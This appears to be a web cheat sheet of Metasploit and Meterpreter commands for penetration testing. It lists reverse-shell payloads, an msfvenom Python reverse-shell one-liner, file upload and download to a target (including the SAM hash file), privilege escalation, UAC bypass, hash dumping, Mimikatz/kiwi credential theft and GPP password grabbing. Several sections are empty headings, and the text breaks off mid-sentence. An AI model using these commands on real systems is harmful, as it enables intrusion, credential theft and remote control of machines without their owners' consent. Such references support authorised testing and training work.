🐮Meterpreter Cheat Sheet

Windows reverse meterpreter payload

• Copy

  set payload windows/meterpreter/reverse_tcp

  • Windows reverse tcp payload

Windows VNC Meterpreter payload

• Copy

  set payload windows/vncinject/reverse_tcp

  • Meterpreter Windows VNC Payload

• Copy

  set ViewOnly false

Linux Reverse Meterpreter payload

• Copy

  set payload linux/meterpreter/reverse_tcp

  • Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

• Copy

  upload file c:\\windows

  • Meterpreter upload file to Windows target

• Copy

  download c:\\windows\\repair\\sam /tmp

  • Meterpreter download file from Windows target

• Copy

  download c:\\windows\\repair\\sam /tmp

  • Meterpreter download file from Windows target

• Copy

  execute -f c:\\windows\temp\exploit.exe

  • Meterpreter run .exe on target – handy for executing uploaded exploits

• Copy

  execute -f cmd -c

  • Creates new channel with cmd shell

• Copy

  ps

  • Meterpreter show processes

• Copy

  shell

  • Meterpreter get shell on the target

• Copy

  getsystem

  • Meterpreter attempts priviledge escalation the target

• Copy

  hashdump

  • Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first)

• Copy

  portfwd add –l 3389 –p 3389 –r target

  • Meterpreter create port forward to target machine

• Copy

  portfwd delete –l 3389 –p 3389 –r target

  • Meterpreter delete port forward

• Copy

  use exploit/windows/local/bypassuac

  • Bypass UAC on Windows 7 + Set target + arch, x86/64

• Copy

  use auxiliary/scanner/http/dir_scanner

  • Metasploit HTTP directory scanner

• Copy

  use auxiliary/scanner/http/jboss_vulnscan

  • Metasploit JBOSS vulnerability scanner

• Copy

  use auxiliary/scanner/mssql/mssql_login

  • Metasploit MSSQL Credential Scanner

• Copy

  use auxiliary/scanner/mysql/mysql_version

  • Metasploit MSSQL Version Scanner

• Copy

  use auxiliary/scanner/oracle/oracle_login

  • Metasploit Oracle Login Module

• Copy

  use exploit/multi/script/web_delivery

  • Metasploit powershell payload delivery module

• Copy

  post/windows/manage/powershell/exec_powershell

  • Metasploit upload and run powershell script through a session

• Copy

  use exploit/multi/http/jboss_maindeployer

  • Metasploit JBOSS deploy

• Copy

  use exploit/windows/mssql/mssql_payload

  • Metasploit MSSQL payload

• Copy

  run post/windows/gather/win_privs

  • Metasploit show privileges of current user

• Copy

  use post/windows/gather/credentials/gpp

  • Metasploit grab GPP saved passwords

• Copy

  load kiwi

• Copy

  creds_all

  • Metasploit load Mimikatz/kiwi and get creds

• Copy

  run post/windows/gather/local_admin_search_enum

  • Idenitfy other machines that the supplied domain user has administrative access to

• Copy

  set AUTORUNSCRIPT post/windows/manage/migrate

Meterpreter Payloads

• • List options

Binaries

Web Payloads

• • PHP

• • Listener

• • PHP

• • ASP

• • JSP

• • WAR

Scripting Payloads

• msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

  • Python

• • Bash

• • Perl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

An example is: